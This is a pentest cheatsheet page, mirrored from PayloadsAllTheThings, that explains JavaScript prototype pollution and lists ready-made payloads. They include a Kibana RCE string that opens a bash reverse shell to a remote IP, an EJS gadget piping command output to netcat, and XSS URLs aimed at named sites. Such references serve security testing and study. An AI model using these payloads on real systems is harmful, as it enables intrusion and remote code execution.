daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

index.md (10517B)


      1 ---
      2 title: "Prototype Pollution"
      3 topic: "Prototype Pollution"
      4 topicSlug: "prototype-pollution"
      5 sourcePath: "Prototype Pollution/README.md"
      6 sourceUrl: "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/3ac27901c711/Prototype%20Pollution/README.md"
      7 sha: "3ac27901c711"
      8 isReadme: true
      9 ---
     10 
     11 # Prototype Pollution
     12 
     13 > Prototype pollution is a type of vulnerability that occurs in JavaScript when properties of Object.prototype are modified. This is particularly risky because JavaScript objects are dynamic and we can add properties to them at any time. Also, almost all objects in JavaScript inherit from Object.prototype, making it a potential attack vector.
     14 
     15 ## Summary
     16 
     17 * [Tools](#tools)
     18 * [Methodology](#methodology)
     19     * [Examples](#examples)
     20     * [Manual Testing](#manual-testing)
     21     * [Prototype Pollution via JSON Input](#prototype-pollution-via-json-input)
     22     * [Prototype Pollution in URL](#prototype-pollution-in-url)
     23     * [Prototype Pollution Payloads](#prototype-pollution-payloads)
     24     * [Prototype Pollution Gadgets](#prototype-pollution-gadgets)
     25 * [Labs](#labs)
     26 * [References](#references)
     27 
     28 ## Tools
     29 
     30 * [yeswehack/pp-finder](https://github.com/yeswehack/pp-finder) - Help you find gadget for prototype pollution exploitation
     31 * [yuske/silent-spring](https://github.com/yuske/silent-spring) - Prototype Pollution Leads to Remote Code Execution in Node.js
     32 * [yuske/server-side-prototype-pollution](https://github.com/yuske/server-side-prototype-pollution) - Server-Side Prototype Pollution gadgets in Node.js core code and 3rd party NPM packages
     33 * [BlackFan/client-side-prototype-pollution](https://github.com/BlackFan/client-side-prototype-pollution) - Prototype Pollution and useful Script Gadgets
     34 * [portswigger/server-side-prototype-pollution](https://github.com/portswigger/server-side-prototype-pollution) - Burp Suite Extension detectiong Prototype Pollution vulnerabilities
     35 * [msrkp/PPScan](https://github.com/msrkp/PPScan) - Client Side Prototype Pollution Scanner
     36 
     37 ## Methodology
     38 
     39 In JavaScript, prototypes are what allow objects to inherit features from other objects. If an attacker is able to add or modify properties of `Object.prototype`, they can essentially affect all objects that inherit from that prototype, potentially leading to various kinds of security risks.
     40 
     41 ```js
     42 var myDog = new Dog();
     43 ```
     44 
     45 ```js
     46 // Points to the function "Dog"
     47 myDog.constructor;
     48 ```
     49 
     50 ```js
     51 // Points to the class definition of "Dog"
     52 myDog.constructor.prototype;
     53 myDog.__proto__;
     54 myDog["__proto__"];
     55 ```
     56 
     57 ### Examples
     58 
     59 * Imagine that an application uses an object to maintain configuration settings, like this:
     60 
     61     ```js
     62     let config = {
     63         isAdmin: false
     64     };
     65     ```
     66 
     67 * An attacker might be able to add an `isAdmin` property to `Object.prototype`, like this:
     68 
     69     ```js
     70     Object.prototype.isAdmin = true;
     71     ```
     72 
     73 ### Manual Testing
     74 
     75 * ExpressJS: `{ "__proto__":{"parameterLimit":1}}` + 2 parameters in GET request, at least 1 must be reflected in the response.
     76 * ExpressJS: `{ "__proto__":{"ignoreQueryPrefix":true}}` + `??foo=bar`
     77 * ExpressJS: `{ "__proto__":{"allowDots":true}}` + `?foo.bar=baz`
     78 * Change the padding of a JSON response: `{ "__proto__":{"json spaces":" "}}` + `{"foo":"bar"}`, the server should return `{"foo": "bar"}`
     79 * Modify CORS header responses: `{ "__proto__":{"exposedHeaders":["foo"]}}`, the server should return the header `Access-Control-Expose-Headers`.
     80 * Change the status code: `{ "__proto__":{"status":510}}`
     81 
     82 ### Prototype Pollution via JSON Input
     83 
     84 You can access the prototype of any object via the magic property `__proto__`.
     85 The `JSON.parse()` function in JavaScript is used to parse a JSON string and convert it into a JavaScript object. Typically it is a sink function where prototype pollution can happen.
     86 
     87 ```js
     88 {
     89     "__proto__": {
     90         "evilProperty": "evilPayload"
     91     }
     92 }
     93 ```
     94 
     95 Asynchronous payload for NodeJS.
     96 
     97 ```js
     98 {
     99   "__proto__": {
    100     "argv0":"node",
    101     "shell":"node",
    102     "NODE_OPTIONS":"--inspect=payload\"\".oastify\"\".com"
    103   }
    104 }
    105 ```
    106 
    107 Polluting the prototype via the `constructor` property instead.
    108 
    109 ```js
    110 {
    111     "constructor": {
    112         "prototype": {
    113             "foo": "bar",
    114             "json spaces": 10
    115         }
    116     }
    117 }
    118 ```
    119 
    120 ### Prototype Pollution in URL
    121 
    122 Example of Prototype Pollution payloads found in the wild.
    123 
    124 ```ps1
    125 https://victim.com/#a=b&__proto__[admin]=1
    126 https://example.com/#__proto__[xxx]=alert(1)
    127 http://server/servicedesk/customer/user/signup?__proto__.preventDefault.__proto__.handleObj.__proto__.delegateTarget=%3Cimg/src/onerror=alert(1)%3E
    128 https://www.apple.com/shop/buy-watch/apple-watch?__proto__[src]=image&__proto__[onerror]=alert(1)
    129 https://www.apple.com/shop/buy-watch/apple-watch?a[constructor][prototype]=image&a[constructor][prototype][onerror]=alert(1)
    130 ```
    131 
    132 ### Prototype Pollution Exploitation
    133 
    134 Depending if the prototype pollution is executed client (CSPP) or server side (SSPP), the impact will vary.
    135 
    136 * Remote Command Execution: [RCE in Kibana (CVE-2019-7609)](https://web.archive.org/web/20191031042307/https://research.securitum.com/prototype-pollution-rce-kibana-cve-2019-7609/)
    137 
    138     ```js
    139     .es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -i >& /dev/tcp/192.168.0.136/12345 0>&1");process.exit()//')
    140     .props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')
    141     ```
    142 
    143 * Remote Command Execution: [RCE using EJS gadgets](https://web.archive.org/web/20230309172121/https://mizu.re/post/ejs-server-side-prototype-pollution-gadgets-to-rce)
    144 
    145     ```js
    146     {
    147         "__proto__": {
    148             "client": 1,
    149             "escapeFunction": "JSON.stringify; process.mainModule.require('child_process').exec('id | nc localhost 4444')"
    150         }
    151     }
    152     ```
    153 
    154 * Reflected XSS: [Reflected XSS on www.hackerone.com via Wistia embed code - #986386](https://web.archive.org/web/20200928082422/https://hackerone.com/reports/986386)
    155 * Client-side bypass: [Prototype pollution – and bypassing client-side HTML sanitizers](https://web.archive.org/web/20200908002825/https://research.securitum.com/prototype-pollution-and-bypassing-client-side-html-sanitizers/)
    156 * Denial of Service
    157 
    158 ### Prototype Pollution Payloads
    159 
    160 ```js
    161 Object.__proto__["evilProperty"]="evilPayload"
    162 Object.__proto__.evilProperty="evilPayload"
    163 Object.constructor.prototype.evilProperty="evilPayload"
    164 Object.constructor["prototype"]["evilProperty"]="evilPayload"
    165 {"__proto__": {"evilProperty": "evilPayload"}}
    166 {"__proto__.name":"test"}
    167 x[__proto__][abaeead] = abaeead
    168 x.__proto__.edcbcab = edcbcab
    169 __proto__[eedffcb] = eedffcb
    170 __proto__.baaebfc = baaebfc
    171 ?__proto__[test]=test
    172 ```
    173 
    174 ### Prototype Pollution Gadgets
    175 
    176 A "gadget" in the context of vulnerabilities typically refers to a piece of code or functionality that can be exploited or leveraged during an attack. When we talk about a "prototype pollution gadget," we're referring to a specific code path, function, or feature of an application that is susceptible to or can be exploited through a prototype pollution attack.
    177 
    178 Either create your own gadget using part of the source with [yeswehack/pp-finder](https://github.com/yeswehack/pp-finder), or try to use already discovered gadgets [yuske/server-side-prototype-pollution](https://github.com/yuske/server-side-prototype-pollution) / [BlackFan/client-side-prototype-pollution](https://github.com/BlackFan/client-side-prototype-pollution).
    179 
    180 ## Labs
    181 
    182 * [YesWeHack Dojo - Prototype Pollution](https://dojo-yeswehack.com/XSS/Training/Prototype-Pollution)
    183 * [PortSwigger - Prototype Pollution](https://portswigger.net/web-security/all-labs#prototype-pollution)
    184 
    185 ## References
    186 
    187 * [A Pentester's Guide to Prototype Pollution Attacks - Harsh Bothra - January 2, 2023](https://web.archive.org/web/20260111201021/https://www.cobalt.io/blog/a-pentesters-guide-to-prototype-pollution-attacks)
    188 * [A tale of making internet pollution free - Exploiting Client-Side Prototype Pollution in the wild - s1r1us - September 28, 2021](https://web.archive.org/web/20260204200448/https://blog.s1r1us.ninja/research/PP)
    189 * [Detecting Server-Side Prototype Pollution - Daniel Thatcher - February 15, 2023](https://web.archive.org/web/20230221012320/https://www.intruder.io/research/server-side-prototype-pollution)
    190 * [Exploiting prototype pollution – RCE in Kibana (CVE-2019-7609) - Michał Bentkowski - October 30, 2019](https://web.archive.org/web/20250810040511/https://research.securitum.com/prototype-pollution-rce-kibana-cve-2019-7609/)
    191 * [Keynote | Server Side Prototype Pollution: Blackbox Detection Without The DoS - Gareth Heyes - March 27, 2023](https://web.archive.org/web/20230327103116/https://youtu.be/LD-KcuKM_0M)
    192 * [NodeJS - \_\_proto\_\_ & prototype Pollution - HackTricks - July 19, 2024](https://web.archive.org/web/20241224163723/https://book.hacktricks.xyz/pentesting-web/deserialization/nodejs-proto-prototype-pollution)
    193 * [Prototype Pollution - PortSwigger - November 10, 2022](https://web.archive.org/web/20221110144930/https://portswigger.net/web-security/prototype-pollution)
    194 * [Prototype pollution - Snyk - August 19, 2023](https://web.archive.org/web/20211010192146/https://learn.snyk.io/lessons/prototype-pollution/javascript/)
    195 * [Prototype pollution and bypassing client-side HTML sanitizers - Michał Bentkowski - August 18, 2020](https://web.archive.org/web/20200908002825/https://research.securitum.com/prototype-pollution-and-bypassing-client-side-html-sanitizers/)
    196 * [Prototype Pollution and Where to Find Them - BitK & SakiiR - August 14, 2023](https://youtu.be/mwpH9DF_RDA)
    197 * [Prototype Pollution Attacks in NodeJS - Olivier Arteau - May 16, 2018](https://github.com/HoLyVieR/prototype-pollution-nsec18/blob/master/paper/JavaScript_prototype_pollution_attack_in_NodeJS.pdf)
    198 * [Prototype Pollution Attacks in NodeJS applications - Olivier Arteau - October 3, 2018](https://web.archive.org/web/20190218093454/https://youtu.be/LUsiFV3dsK8)
    199 * [Prototype Pollution Leads to RCE: Gadgets Everywhere - Mikhail Shcherbakov - September 29, 2023](https://web.archive.org/web/20240416043553/https://youtu.be/v5dq80S1WF4)
    200 * [Server side prototype pollution, how to detect and exploit - BitK - February 18, 2023](http://web.archive.org/web/20230218081534/https://blog.yeswehack.com/talent-development/server-side-prototype-pollution-how-to-detect-and-exploit/)
    201 * [Server-side prototype pollution: Black-box detection without the DoS - Gareth Heyes - February 15, 2023](https://web.archive.org/web/20260219234352/https://portswigger.net/research/server-side-prototype-pollution)